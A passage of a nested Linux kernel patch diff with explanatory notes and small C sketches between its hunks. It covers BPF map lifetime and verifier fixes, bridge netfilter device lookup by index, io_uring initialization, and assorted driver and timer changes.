++static inline int
++bpf_map_init_elem_count(struct bpf_map *map)
++{
++	size_t size = sizeof(*map->elem_count), align = size;
++	gfp_t flags = GFP_USER | __GFP_NOWARN;
++
++	map->elem_count = bpf_map_alloc_percpu(map, size, align, flags);
++	if (!map->elem_count)
++		return -ENOMEM;
++
++	return 0;
++}
++
++static inline void
++bpf_map_free_elem_count(struct bpf_map *map)
++{
++	free_percpu(map->elem_count);
++}
++
++static inline void bpf_map_inc_elem_count(struct bpf_map *map)
++{
++	this_cpu_inc(*map->elem_count);
++}
++
++static inline void bpf_map_dec_elem_count(struct bpf_map *map)
++{
++	this_cpu_dec(*map->elem_count);
++}
++
+ extern int sysctl_unprivileged_bpf_disabled;
+ 
+ static inline bool bpf_allow_ptr_leaks(void)
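
The elem_count helpers added above follow the usual per-CPU counter pattern: each CPU increments or decrements its own slot without atomics, and a total, when needed, is the approximate sum over all slots. A userspace sketch of the idea, faking the bpf_map_alloc_percpu() allocation with a flat array:

#include <stdio.h>

#define NR_CPUS 4

/* Flat array standing in for a bpf_map_alloc_percpu() allocation */
struct map { long elem_count[NR_CPUS]; };

static void inc_elem(struct map *m, int cpu) { m->elem_count[cpu]++; }
static void dec_elem(struct map *m, int cpu) { m->elem_count[cpu]--; }

static long sum_elems(const struct map *m)
{
	long sum = 0;

	for (int cpu = 0; cpu < NR_CPUS; cpu++)
		sum += m->elem_count[cpu];	/* racy but adequate estimate */
	return sum;
}

int main(void)
{
	struct map m = { { 0 } };

	inc_elem(&m, 0);	/* insert on CPU 0 */
	inc_elem(&m, 2);	/* two inserts on CPU 2 */
	inc_elem(&m, 2);
	dec_elem(&m, 1);	/* matching delete observed on CPU 1 */
	printf("%ld\n", sum_elems(&m));	/* 2 */
	return 0;
}
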
+diff --git a/include/linux/clk-provider.h b/include/linux/clk-provider.h
+index 15e336281d1f4..94fcfefb52f3c 100644
+--- a/include/linux/clk-provider.h
++++ b/include/linux/clk-provider.h
+@@ -446,8 +446,8 @@ struct clk *clk_register_fixed_rate(struct device *dev, const char *name,
+  */
+ #define clk_hw_register_fixed_rate_with_accuracy_parent_hw(dev, name,	      \
+ 		parent_hw, flags, fixed_rate, fixed_accuracy)		      \
+-	__clk_hw_register_fixed_rate((dev), NULL, (name), NULL, (parent_hw)   \
+-				     NULL, NULL, (flags), (fixed_rate),	      \
++	__clk_hw_register_fixed_rate((dev), NULL, (name), NULL, (parent_hw),  \
++				     NULL, (flags), (fixed_rate),	      \
+ 				     (fixed_accuracy), 0, false)
+ /**
+  * clk_hw_register_fixed_rate_with_accuracy_parent_data - register fixed-rate
+diff --git a/include/linux/hisi_acc_qm.h b/include/linux/hisi_acc_qm.h
+index 41203ce27d64c..b566ae420449c 100644
+--- a/include/linux/hisi_acc_qm.h
++++ b/include/linux/hisi_acc_qm.h
+@@ -161,6 +161,11 @@ enum qm_cap_bits {
+ 	QM_SUPPORT_RPM,
+ };
+ 
++struct qm_dev_alg {
++	u64 alg_msk;
++	const char *alg;
++};
++
+ struct dfx_diff_registers {
+ 	u32 *regs;
+ 	u32 reg_offset;
+@@ -266,6 +271,16 @@ struct hisi_qm_cap_info {
+ 	u32 v3_val;
+ };
+ 
++struct hisi_qm_cap_record {
++	u32 type;
++	u32 cap_val;
++};
++
++struct hisi_qm_cap_tables {
++	struct hisi_qm_cap_record *qm_cap_table;
++	struct hisi_qm_cap_record *dev_cap_table;
++};
++
+ struct hisi_qm_list {
+ 	struct mutex lock;
+ 	struct list_head list;
+@@ -337,7 +352,6 @@ struct hisi_qm {
+ 	struct work_struct rst_work;
+ 	struct work_struct cmd_process;
+ 
+-	const char *algs;
+ 	bool use_sva;
+ 	bool is_frozen;
+ 
+@@ -348,6 +362,8 @@ struct hisi_qm {
+ 	struct qm_shaper_factor *factor;
+ 	u32 mb_qos;
+ 	u32 type_rate;
++
++	struct hisi_qm_cap_tables cap_tables;
+ };
+ 
+ struct hisi_qp_status {
+@@ -521,6 +537,8 @@ void hisi_qm_regs_dump(struct seq_file *s, struct debugfs_regset32 *regset);
+ u32 hisi_qm_get_hw_info(struct hisi_qm *qm,
+ 			const struct hisi_qm_cap_info *info_table,
+ 			u32 index, bool is_read);
++int hisi_qm_set_algs(struct hisi_qm *qm, u64 alg_msk, const struct qm_dev_alg *dev_algs,
++		     u32 dev_algs_size);
+ 
+ /* Used by VFIO ACC live migration driver */
+ struct pci_driver *hisi_sec_get_pf_driver(void);
+diff --git a/include/linux/iio/adc/adi-axi-adc.h b/include/linux/iio/adc/adi-axi-adc.h
+index 52620e5b80522..b7904992d5619 100644
+--- a/include/linux/iio/adc/adi-axi-adc.h
++++ b/include/linux/iio/adc/adi-axi-adc.h
+@@ -41,6 +41,7 @@ struct adi_axi_adc_chip_info {
+  * @reg_access		IIO debugfs_reg_access hook for the client ADC
+  * @read_raw		IIO read_raw hook for the client ADC
+  * @write_raw		IIO write_raw hook for the client ADC
++ * @read_avail		IIO read_avail hook for the client ADC
+  */
+ struct adi_axi_adc_conv {
+ 	const struct adi_axi_adc_chip_info		*chip_info;
+@@ -54,6 +55,9 @@ struct adi_axi_adc_conv {
+ 	int (*write_raw)(struct adi_axi_adc_conv *conv,
+ 			 struct iio_chan_spec const *chan,
+ 			 int val, int val2, long mask);
++	int (*read_avail)(struct adi_axi_adc_conv *conv,
++			  struct iio_chan_spec const *chan,
++			  const int **val, int *type, int *length, long mask);
+ };
+ 
+ struct adi_axi_adc_conv *devm_adi_axi_adc_conv_register(struct device *dev,
+diff --git a/include/linux/netfilter_bridge.h b/include/linux/netfilter_bridge.h
+index f980edfdd2783..743475ca7e9d5 100644
+--- a/include/linux/netfilter_bridge.h
++++ b/include/linux/netfilter_bridge.h
+@@ -42,7 +42,7 @@ static inline int nf_bridge_get_physinif(const struct sk_buff *skb)
+ 	if (!nf_bridge)
+ 		return 0;
+ 
+-	return nf_bridge->physindev ? nf_bridge->physindev->ifindex : 0;
++	return nf_bridge->physinif;
+ }
+ 
+ static inline int nf_bridge_get_physoutif(const struct sk_buff *skb)
+@@ -56,11 +56,11 @@ static inline int nf_bridge_get_physoutif(const struct sk_buff *skb)
+ }
+ 
+ static inline struct net_device *
+-nf_bridge_get_physindev(const struct sk_buff *skb)
++nf_bridge_get_physindev(const struct sk_buff *skb, struct net *net)
+ {
+ 	const struct nf_bridge_info *nf_bridge = nf_bridge_info_get(skb);
+ 
+-	return nf_bridge ? nf_bridge->physindev : NULL;
++	return nf_bridge ? dev_get_by_index_rcu(net, nf_bridge->physinif) : NULL;
+ }
+ 
+ static inline struct net_device *
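
Replacing the cached struct net_device pointer with an ifindex is the key design choice behind these bridge hunks: an integer can never dangle, but every user must now re-resolve it (in the kernel, via dev_get_by_index_rcu() under RCU) and cope with the device having disappeared, which is why the later br_netfilter hunks grow NULL checks and drop paths. A standalone sketch of the same weak-reference-by-index idea, all names illustrative:

/* Cache an index, not a pointer; re-resolve at use time and
 * handle "device gone".  Illustrative userspace code only.
 */
#include <stdio.h>
#include <stddef.h>

struct device { int ifindex; const char *name; };

static struct device *registry[8];     /* slot = ifindex */

static struct device *dev_by_index(int ifindex)
{
	if (ifindex <= 0 || ifindex >= 8)
		return NULL;
	return registry[ifindex];
}

int main(void)
{
	struct device eth = { .ifindex = 2, .name = "eth0" };

	registry[2] = &eth;
	int cached_ifindex = eth.ifindex;  /* store the index, not &eth */

	struct device *d = dev_by_index(cached_ifindex);
	printf("%s\n", d ? d->name : "(gone)");   /* eth0 */

	registry[2] = NULL;                /* device unregisters */
	d = dev_by_index(cached_ifindex);
	printf("%s\n", d ? d->name : "(gone)");   /* (gone): caller must drop */
	return 0;
}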
+diff --git a/include/linux/of.h b/include/linux/of.h
+index 6b79ef9a6541f..1c5301e10442f 100644
+--- a/include/linux/of.h
++++ b/include/linux/of.h
+@@ -1155,7 +1155,8 @@ static inline int of_property_read_string_index(const struct device_node *np,
+  * @np:		device node from which the property value is to be read.
+  * @propname:	name of the property to be searched.
+  *
+- * Search for a property in a device node.
++ * Search for a boolean property in a device node. Usage on non-boolean
++ * property types is deprecated.
+  *
+  * Return: true if the property exists false otherwise.
+  */
+@@ -1167,6 +1168,20 @@ static inline bool of_property_read_bool(const struct device_node *np,
+ 	return prop ? true : false;
+ }
+ 
++/**
++ * of_property_present - Test if a property is present in a node
++ * @np:		device node to search for the property.
++ * @propname:	name of the property to be searched.
++ *
++ * Test for a property present in a device node.
++ *
++ * Return: true if the property exists false otherwise.
++ */
++static inline bool of_property_present(const struct device_node *np, const char *propname)
++{
++	return of_property_read_bool(np, propname);
++}
++
+ /**
+  * of_property_read_u8_array - Find and read an array of u8 from a property.
+  *
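
The new helper is a thin alias today, but it lets callers state intent: of_property_present() for "does this property exist at all", of_property_read_bool() only for genuine boolean flags. A kernel-style fragment (not standalone; "vendor,use-dma" and setup_dma() are invented for illustration, while "wakeup-source" is a real boolean DT property):

	if (of_property_present(np, "vendor,use-dma"))
		setup_dma(pdev);               /* property exists; value irrelevant */

	if (of_property_read_bool(np, "wakeup-source"))
		device_init_wakeup(dev, true); /* a true boolean flag */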
+diff --git a/include/linux/rcupdate.h b/include/linux/rcupdate.h
+index e9e61cd27ef63..46bd9a331fd5d 100644
+--- a/include/linux/rcupdate.h
++++ b/include/linux/rcupdate.h
+@@ -242,6 +242,18 @@ static inline void exit_tasks_rcu_stop(void) { }
+ static inline void exit_tasks_rcu_finish(void) { }
+ #endif /* #else #ifdef CONFIG_TASKS_RCU_GENERIC */
+ 
++/**
++ * rcu_trace_implies_rcu_gp - does an RCU Tasks Trace grace period imply an RCU grace period?
++ *
++ * As an accident of implementation, an RCU Tasks Trace grace period also
++ * acts as an RCU grace period.  However, this could change at any time.
++ * Code relying on this accident must call this function to verify that
++ * this accident is still happening.
++ *
++ * You have been warned!
++ */
++static inline bool rcu_trace_implies_rcu_gp(void) { return true; }
++
+ /**
+  * cond_resched_tasks_rcu_qs - Report potential quiescent states to RCU
+  *
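
The bpf_map hunks later in this patch are the user of this guarantee; the caller pattern the kernel-doc implies looks like the following kernel-style sketch (not standalone; struct obj and free_obj() are illustrative):

/* Free an object only after both a tasks-trace grace period and a
 * regular RCU grace period, skipping the second one when the first
 * already implies it.
 */
static void free_obj_rcu(struct rcu_head *rcu)
{
	free_obj(container_of(rcu, struct obj, rcu));
}

static void free_obj_tasks_trace(struct rcu_head *rcu)
{
	if (rcu_trace_implies_rcu_gp())
		free_obj_rcu(rcu);           /* trace GP already implied an RCU GP */
	else
		call_rcu(rcu, free_obj_rcu); /* chain a second, regular GP */
}

/* caller: call_rcu_tasks_trace(&obj->rcu, free_obj_tasks_trace); */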
+diff --git a/include/linux/skbuff.h b/include/linux/skbuff.h
+index 2feee144fc0ef..c30d419ebf545 100644
+--- a/include/linux/skbuff.h
++++ b/include/linux/skbuff.h
+@@ -301,7 +301,7 @@ struct nf_bridge_info {
+ 	u8			bridged_dnat:1;
+ 	u8			sabotage_in_done:1;
+ 	__u16			frag_max_size;
+-	struct net_device	*physindev;
++	int			physinif;
+ 
+ 	/* always valid & non-NULL from FORWARD on, for physdev match */
+ 	struct net_device	*physoutdev;
+diff --git a/include/net/bluetooth/hci_core.h b/include/net/bluetooth/hci_core.h
+index 5f8a534b65746..09c978f3d95dc 100644
+--- a/include/net/bluetooth/hci_core.h
++++ b/include/net/bluetooth/hci_core.h
+@@ -942,7 +942,6 @@ void hci_inquiry_cache_flush(struct hci_dev *hdev);
+ /* ----- HCI Connections ----- */
+ enum {
+ 	HCI_CONN_AUTH_PEND,
+-	HCI_CONN_REAUTH_PEND,
+ 	HCI_CONN_ENCRYPT_PEND,
+ 	HCI_CONN_RSWITCH_PEND,
+ 	HCI_CONN_MODE_CHANGE_PEND,
+diff --git a/include/uapi/linux/bpf.h b/include/uapi/linux/bpf.h
+index 92dbe89dafbf5..201dc77ebbd77 100644
+--- a/include/uapi/linux/bpf.h
++++ b/include/uapi/linux/bpf.h
+@@ -4353,6 +4353,8 @@ union bpf_attr {
+  * long bpf_get_task_stack(struct task_struct *task, void *buf, u32 size, u64 flags)
+  *	Description
+  *		Return a user or a kernel stack in bpf program provided buffer.
++ *		Note: the user stack will only be populated if the *task* is
++ *		the current task; all other tasks will return -EOPNOTSUPP.
+  *		To achieve this, the helper needs *task*, which is a valid
+  *		pointer to **struct task_struct**. To store the stacktrace, the
+  *		bpf program provides *buf* with a nonnegative *size*.
+@@ -4364,6 +4366,7 @@ union bpf_attr {
+  *
+  *		**BPF_F_USER_STACK**
+  *			Collect a user space stack instead of a kernel stack.
++ *			The *task* must be the current task.
+  *		**BPF_F_USER_BUILD_ID**
+  *			Collect buildid+offset instead of ips for user stack,
+  *			only valid if **BPF_F_USER_STACK** is also specified.
+diff --git a/init/do_mounts.c b/init/do_mounts.c
+index 811e94daf0a84..2d705b9c84007 100644
+--- a/init/do_mounts.c
++++ b/init/do_mounts.c
+@@ -665,7 +665,10 @@ struct file_system_type rootfs_fs_type = {
+ 
+ void __init init_rootfs(void)
+ {
+-	if (IS_ENABLED(CONFIG_TMPFS) && !saved_root_name[0] &&
+-		(!root_fs_names || strstr(root_fs_names, "tmpfs")))
+-		is_tmpfs = true;
++	if (IS_ENABLED(CONFIG_TMPFS)) {
++		if (!saved_root_name[0] && !root_fs_names)
++			is_tmpfs = true;
++		else if (root_fs_names && !!strstr(root_fs_names, "tmpfs"))
++			is_tmpfs = true;
++	}
+ }
+diff --git a/io_uring/rw.c b/io_uring/rw.c
+index 0133db648d8e9..038e6b13a7496 100644
+--- a/io_uring/rw.c
++++ b/io_uring/rw.c
+@@ -534,15 +534,19 @@ static inline int io_rw_prep_async(struct io_kiocb *req, int rw)
+ 	struct iovec *iov;
+ 	int ret;
+ 
++	iorw->bytes_done = 0;
++	iorw->free_iovec = NULL;
++
+ 	/* submission path, ->uring_lock should already be taken */
+ 	ret = io_import_iovec(rw, req, &iov, &iorw->s, 0);
+ 	if (unlikely(ret < 0))
+ 		return ret;
+ 
+-	iorw->bytes_done = 0;
+-	iorw->free_iovec = iov;
+-	if (iov)
++	if (iov) {
++		iorw->free_iovec = iov;
+ 		req->flags |= REQ_F_NEED_CLEANUP;
++	}
++
+ 	return 0;
+ }
+ 
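
The io_rw_prep_async() fix is an instance of a general pattern worth spelling out: any field a shared cleanup path may inspect must be initialized before the function's first early return. A standalone illustration with invented names:

#include <stdlib.h>

struct async_state { void *free_iovec; int bytes_done; };

static int prep(struct async_state *s, int fail)
{
	s->bytes_done = 0;
	s->free_iovec = NULL;      /* init *before* any early return */

	if (fail)
		return -1;         /* cleanup now sees NULL, not stack garbage */

	s->free_iovec = malloc(64);
	return s->free_iovec ? 0 : -1;
}

static void cleanup(struct async_state *s)
{
	free(s->free_iovec);       /* safe: NULL or a valid allocation */
}

int main(void)
{
	struct async_state s;

	if (prep(&s, 1) < 0)
		cleanup(&s);       /* would be undefined behavior without the early init */
	return 0;
}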
+diff --git a/kernel/bpf/arraymap.c b/kernel/bpf/arraymap.c
+index 00f23febb9a7d..c04e69f34e4d5 100644
+--- a/kernel/bpf/arraymap.c
++++ b/kernel/bpf/arraymap.c
+@@ -852,7 +852,7 @@ int bpf_fd_array_map_update_elem(struct bpf_map *map, struct file *map_file,
+ 	}
+ 
+ 	if (old_ptr)
+-		map->ops->map_fd_put_ptr(old_ptr);
++		map->ops->map_fd_put_ptr(map, old_ptr, true);
+ 	return 0;
+ }
+ 
+@@ -875,7 +875,7 @@ static int fd_array_map_delete_elem(struct bpf_map *map, void *key)
+ 	}
+ 
+ 	if (old_ptr) {
+-		map->ops->map_fd_put_ptr(old_ptr);
++		map->ops->map_fd_put_ptr(map, old_ptr, true);
+ 		return 0;
+ 	} else {
+ 		return -ENOENT;
+@@ -898,8 +898,9 @@ static void *prog_fd_array_get_ptr(struct bpf_map *map,
+ 	return prog;
+ }
+ 
+-static void prog_fd_array_put_ptr(void *ptr)
++static void prog_fd_array_put_ptr(struct bpf_map *map, void *ptr, bool need_defer)
+ {
++	/* bpf_prog is freed after one RCU or tasks trace grace period */
+ 	bpf_prog_put(ptr);
+ }
+ 
+@@ -1185,8 +1186,9 @@ err_out:
+ 	return ee;
+ }
+ 
+-static void perf_event_fd_array_put_ptr(void *ptr)
++static void perf_event_fd_array_put_ptr(struct bpf_map *map, void *ptr, bool need_defer)
+ {
++	/* bpf_perf_event is freed after one RCU grace period */
+ 	bpf_event_entry_free_rcu(ptr);
+ }
+ 
+@@ -1239,7 +1241,7 @@ static void *cgroup_fd_array_get_ptr(struct bpf_map *map,
+ 	return cgroup_get_from_fd(fd);
+ }
+ 
+-static void cgroup_fd_array_put_ptr(void *ptr)
++static void cgroup_fd_array_put_ptr(struct bpf_map *map, void *ptr, bool need_defer)
+ {
+ 	/* cgroup_put free cgrp after a rcu grace period */
+ 	cgroup_put(ptr);
+diff --git a/kernel/bpf/hashtab.c b/kernel/bpf/hashtab.c
+index ce0051eee746e..88c71de0a0a95 100644
+--- a/kernel/bpf/hashtab.c
++++ b/kernel/bpf/hashtab.c
+@@ -880,7 +880,7 @@ static void htab_put_fd_value(struct bpf_htab *htab, struct htab_elem *l)
+ 
+ 	if (map->ops->map_fd_put_ptr) {
+ 		ptr = fd_htab_map_get_ptr(map, l);
+-		map->ops->map_fd_put_ptr(ptr);
++		map->ops->map_fd_put_ptr(map, ptr, true);
+ 	}
+ }
+ 
+@@ -2424,7 +2424,7 @@ static void fd_htab_map_free(struct bpf_map *map)
+ 		hlist_nulls_for_each_entry_safe(l, n, head, hash_node) {
+ 			void *ptr = fd_htab_map_get_ptr(map, l);
+ 
+-			map->ops->map_fd_put_ptr(ptr);
++			map->ops->map_fd_put_ptr(map, ptr, false);
+ 		}
+ 	}
+ 
+@@ -2465,7 +2465,7 @@ int bpf_fd_htab_map_update_elem(struct bpf_map *map, struct file *map_file,
+ 
+ 	ret = htab_map_update_elem(map, key, &ptr, map_flags);
+ 	if (ret)
+-		map->ops->map_fd_put_ptr(ptr);
++		map->ops->map_fd_put_ptr(map, ptr, false);
+ 
+ 	return ret;
+ }
+diff --git a/kernel/bpf/lpm_trie.c b/kernel/bpf/lpm_trie.c
+index d833496e9e426..ce3a091d52e89 100644
+--- a/kernel/bpf/lpm_trie.c
++++ b/kernel/bpf/lpm_trie.c
+@@ -231,6 +231,9 @@ static void *trie_lookup_elem(struct bpf_map *map, void *_key)
+ 	struct lpm_trie_node *node, *found = NULL;
+ 	struct bpf_lpm_trie_key *key = _key;
+ 
++	if (key->prefixlen > trie->max_prefixlen)
++		return NULL;
++
+ 	/* Start walking the trie from the root node ... */
+ 
+ 	for (node = rcu_dereference_check(trie->root, rcu_read_lock_bh_held());
+diff --git a/kernel/bpf/map_in_map.c b/kernel/bpf/map_in_map.c
+index 8e87f69aae60d..141f3332038c7 100644
+--- a/kernel/bpf/map_in_map.c
++++ b/kernel/bpf/map_in_map.c
+@@ -115,12 +115,17 @@ void *bpf_map_fd_get_ptr(struct bpf_map *map,
+ 	return inner_map;
+ }
+ 
+-void bpf_map_fd_put_ptr(void *ptr)
++void bpf_map_fd_put_ptr(struct bpf_map *map, void *ptr, bool need_defer)
+ {
+-	/* ptr->ops->map_free() has to go through one
+-	 * rcu grace period by itself.
++	struct bpf_map *inner_map = ptr;
++
++	/* The inner map may still be used by both non-sleepable and sleepable
++	 * bpf program, so free it after one RCU grace period and one tasks
++	 * trace RCU grace period.
+ 	 */
+-	bpf_map_put(ptr);
++	if (need_defer)
++		WRITE_ONCE(inner_map->free_after_mult_rcu_gp, true);
++	bpf_map_put(inner_map);
+ }
+ 
+ u32 bpf_map_fd_sys_lookup_elem(void *ptr)
+diff --git a/kernel/bpf/map_in_map.h b/kernel/bpf/map_in_map.h
+index bcb7534afb3c0..7d61602354de8 100644
+--- a/kernel/bpf/map_in_map.h
++++ b/kernel/bpf/map_in_map.h
+@@ -13,7 +13,7 @@ struct bpf_map *bpf_map_meta_alloc(int inner_map_ufd);
+ void bpf_map_meta_free(struct bpf_map *map_meta);
+ void *bpf_map_fd_get_ptr(struct bpf_map *map, struct file *map_file,
+ 			 int ufd);
+-void bpf_map_fd_put_ptr(void *ptr);
++void bpf_map_fd_put_ptr(struct bpf_map *map, void *ptr, bool need_defer);
+ u32 bpf_map_fd_sys_lookup_elem(void *ptr);
+ 
+ #endif
+diff --git a/kernel/bpf/stackmap.c b/kernel/bpf/stackmap.c
+index aecea7451b610..f86db3cf72123 100644
+--- a/kernel/bpf/stackmap.c
++++ b/kernel/bpf/stackmap.c
+@@ -391,6 +391,7 @@ static long __bpf_get_stack(struct pt_regs *regs, struct task_struct *task,
+ {
+ 	u32 trace_nr, copy_len, elem_size, num_elem, max_depth;
+ 	bool user_build_id = flags & BPF_F_USER_BUILD_ID;
++	bool crosstask = task && task != current;
+ 	u32 skip = flags & BPF_F_SKIP_FIELD_MASK;
+ 	bool user = flags & BPF_F_USER_STACK;
+ 	struct perf_callchain_entry *trace;
+@@ -413,6 +414,14 @@ static long __bpf_get_stack(struct pt_regs *regs, struct task_struct *task,
+ 	if (task && user && !user_mode(regs))
+ 		goto err_fault;
+ 
++	/* get_perf_callchain does not support crosstask user stack walking
++	 * but returns an empty stack instead of NULL.
++	 */
++	if (crosstask && user) {
++		err = -EOPNOTSUPP;
++		goto clear;
++	}
++
+ 	num_elem = size / elem_size;
+ 	max_depth = num_elem + skip;
+ 	if (sysctl_perf_event_max_stack < max_depth)
+@@ -424,7 +433,7 @@ static long __bpf_get_stack(struct pt_regs *regs, struct task_struct *task,
+ 		trace = get_callchain_entry_for_task(task, max_depth);
+ 	else
+ 		trace = get_perf_callchain(regs, 0, kernel, user, max_depth,
+-					   false, false);
++					   crosstask, false);
+ 	if (unlikely(!trace))
+ 		goto err_fault;
+ 
+diff --git a/kernel/bpf/syscall.c b/kernel/bpf/syscall.c
+index 0c8b7733573ee..8d0c38a8dcf2d 100644
+--- a/kernel/bpf/syscall.c
++++ b/kernel/bpf/syscall.c
+@@ -628,6 +628,28 @@ static void bpf_map_put_uref(struct bpf_map *map)
+ 	}
+ }
+ 
++static void bpf_map_free_in_work(struct bpf_map *map)
++{
++	INIT_WORK(&map->work, bpf_map_free_deferred);
++	/* Avoid spawning kworkers, since they all might contend
++	 * for the same mutex like slab_mutex.
++	 */
++	queue_work(system_unbound_wq, &map->work);
++}
++
++static void bpf_map_free_rcu_gp(struct rcu_head *rcu)
++{
++	bpf_map_free_in_work(container_of(rcu, struct bpf_map, rcu));
++}
++
++static void bpf_map_free_mult_rcu_gp(struct rcu_head *rcu)
++{
++	if (rcu_trace_implies_rcu_gp())
++		bpf_map_free_rcu_gp(rcu);
++	else
++		call_rcu(rcu, bpf_map_free_rcu_gp);
++}
++
+ /* decrement map refcnt and schedule it for freeing via workqueue
+  * (unrelying map implementation ops->map_free() might sleep)
+  */
+@@ -637,11 +659,11 @@ static void __bpf_map_put(struct bpf_map *map, bool do_idr_lock)
+ 		/* bpf_map_free_id() must be called first */
+ 		bpf_map_free_id(map, do_idr_lock);
+ 		btf_put(map->btf);
+-		INIT_WORK(&map->work, bpf_map_free_deferred);
+-		/* Avoid spawning kworkers, since they all might contend
+-		 * for the same mutex like slab_mutex.
+-		 */
+-		queue_work(system_unbound_wq, &map->work);
++
++		if (READ_ONCE(map->free_after_mult_rcu_gp))
++			call_rcu_tasks_trace(&map->rcu, bpf_map_free_mult_rcu_gp);
++		else
++			bpf_map_free_in_work(map);
+ 	}
+ }
+ 
+@@ -3036,6 +3058,10 @@ static int bpf_tracing_prog_attach(struct bpf_prog *prog,
+ 	 *
+ 	 * - if prog->aux->dst_trampoline and tgt_prog is NULL, the program
+ 	 *   was detached and is going for re-attachment.
++	 *
++	 * - if prog->aux->dst_trampoline is NULL and tgt_prog and prog->aux->attach_btf
++	 *   are NULL, then program was already attached and user did not provide
++	 *   tgt_prog_fd so we have no way to find out or create trampoline
+ 	 */
+ 	if (!prog->aux->dst_trampoline && !tgt_prog) {
+ 		/*
+@@ -3049,6 +3075,11 @@ static int bpf_tracing_prog_attach(struct bpf_prog *prog,
+ 			err = -EINVAL;
+ 			goto out_unlock;
+ 		}
++		/* We can allow re-attach only if we have valid attach_btf. */
++		if (!prog->aux->attach_btf) {
++			err = -EINVAL;
++			goto out_unlock;
++		}
+ 		btf_id = prog->aux->attach_btf_id;
+ 		key = bpf_trampoline_compute_key(NULL, prog->aux->attach_btf, btf_id);
+ 	}
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 142e10d49fd81..23b6d57b5eef2 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -3284,7 +3284,7 @@ static int check_stack_write_fixed_off(struct bpf_verifier_env *env,
+ 	 * so it's aligned access and [off, off + size) are within stack limits
+ 	 */
+ 	if (!env->allow_ptr_leaks &&
+-	    state->stack[spi].slot_type[0] == STACK_SPILL &&
++	    is_spilled_reg(&state->stack[spi]) &&
+ 	    size != BPF_REG_SIZE) {
+ 		verbose(env, "attempt to corrupt spilled pointer on stack\n");
+ 		return -EACCES;
+@@ -4950,10 +4950,7 @@ static int check_stack_access_within_bounds(
+ 
+ 	if (tnum_is_const(reg->var_off)) {
+ 		min_off = reg->var_off.value + off;
+-		if (access_size > 0)
+-			max_off = min_off + access_size - 1;
+-		else
+-			max_off = min_off;
++		max_off = min_off + access_size;
+ 	} else {
+ 		if (reg->smax_value >= BPF_MAX_VAR_OFF ||
+ 		    reg->smin_value <= -BPF_MAX_VAR_OFF) {
+@@ -4962,15 +4959,12 @@ static int check_stack_access_within_bounds(
+ 			return -EACCES;
+ 		}
+ 		min_off = reg->smin_value + off;
+-		if (access_size > 0)
+-			max_off = reg->smax_value + off + access_size - 1;
+-		else
+-			max_off = min_off;
++		max_off = reg->smax_value + off + access_size;
+ 	}
+ 
+ 	err = check_stack_slot_within_bounds(min_off, state, type);
+-	if (!err)
+-		err = check_stack_slot_within_bounds(max_off, state, type);
++	if (!err && max_off > 0)
++		err = -EINVAL; /* out of stack access into non-negative offsets */
+ 
+ 	if (err) {
+ 		if (tnum_is_const(reg->var_off)) {
+@@ -7284,6 +7278,13 @@ static int prepare_func_exit(struct bpf_verifier_env *env, int *insn_idx)
+ 			verbose(env, "R0 not a scalar value\n");
+ 			return -EACCES;
+ 		}
++
++		/* we are going to rely on register's precise value */
++		err = mark_reg_read(env, r0, r0->parent, REG_LIVE_READ64);
++		err = err ?: mark_chain_precision(env, BPF_REG_0);
++		if (err)
++			return err;
++
+ 		if (!tnum_in(range, r0->var_off)) {
+ 			verbose_invalid_scalar(env, r0, &range, "callback return", "R0");
+ 			return -EINVAL;
+@@ -8540,6 +8541,10 @@ static int adjust_ptr_min_max_vals(struct bpf_verifier_env *env,
+ 	}
+ 
+ 	switch (base_type(ptr_reg->type)) {
++	case PTR_TO_FLOW_KEYS:
++		if (known)
++			break;
++		fallthrough;
+ 	case CONST_PTR_TO_MAP:
+ 		/* smin_val represents the known value */
+ 		if (known && smin_val == 0 && opcode == BPF_ADD)
+diff --git a/kernel/debug/kdb/kdb_main.c b/kernel/debug/kdb/kdb_main.c
+index 438b868cbfa92..35aa2e98a92a9 100644
+--- a/kernel/debug/kdb/kdb_main.c
++++ b/kernel/debug/kdb/kdb_main.c
+@@ -1349,8 +1349,6 @@ do_full_getstr:
+ 		/* PROMPT can only be set if we have MEM_READ permission. */
+ 		snprintf(kdb_prompt_str, CMD_BUFLEN, kdbgetenv("PROMPT"),
+ 			 raw_smp_processor_id());
+-		if (defcmd_in_progress)
+-			strncat(kdb_prompt_str, "[defcmd]", CMD_BUFLEN);
+ 
+ 		/*
+ 		 * Fetch command from keyboard
+diff --git a/kernel/dma/coherent.c b/kernel/dma/coherent.c
+index c21abc77c53e9..ff5683a57f771 100644
+--- a/kernel/dma/coherent.c
++++ b/kernel/dma/coherent.c
+@@ -132,8 +132,10 @@ int dma_declare_coherent_memory(struct device *dev, phys_addr_t phys_addr,
+ 
+ void dma_release_coherent_memory(struct device *dev)
+ {
+-	if (dev)
++	if (dev) {
+ 		_dma_release_coherent_memory(dev->dma_mem);
++		dev->dma_mem = NULL;
++	}
+ }
+ 
+ static void *__dma_alloc_from_coherent(struct device *dev,
+diff --git a/kernel/rcu/tasks.h b/kernel/rcu/tasks.h
+index c1f18c63b9b14..b5d5b6cf093a7 100644
+--- a/kernel/rcu/tasks.h
++++ b/kernel/rcu/tasks.h
+@@ -1570,6 +1570,8 @@ static void rcu_tasks_trace_postscan(struct list_head *hop)
+ {
+ 	// Wait for late-stage exiting tasks to finish exiting.
+ 	// These might have passed the call to exit_tasks_rcu_finish().
++
++	// If you remove the following line, update rcu_trace_implies_rcu_gp()!!!
+ 	synchronize_rcu();
+ 	// Any tasks that exit after this point will set
+ 	// TRC_NEED_QS_CHECKED in ->trc_reader_special.b.need_qs.
+diff --git a/kernel/time/tick-sched.c b/kernel/time/tick-sched.c
+index 798e1841d2863..1a5d02224d465 100644
+--- a/kernel/time/tick-sched.c
++++ b/kernel/time/tick-sched.c
+@@ -1556,13 +1556,18 @@ void tick_setup_sched_timer(void)
+ void tick_cancel_sched_timer(int cpu)
+ {
+ 	struct tick_sched *ts = &per_cpu(tick_cpu_sched, cpu);
++	ktime_t idle_sleeptime, iowait_sleeptime;
+ 
+ # ifdef CONFIG_HIGH_RES_TIMERS
+ 	if (ts->sched_timer.base)
+ 		hrtimer_cancel(&ts->sched_timer);
+ # endif
+ 
++	idle_sleeptime = ts->idle_sleeptime;
++	iowait_sleeptime = ts->iowait_sleeptime;
+ 	memset(ts, 0, sizeof(*ts));
++	ts->idle_sleeptime = idle_sleeptime;
++	ts->iowait_sleeptime = iowait_sleeptime;
+ }
+ #endif
+ 
+diff --git a/lib/kunit/debugfs.c b/lib/kunit/debugfs.c
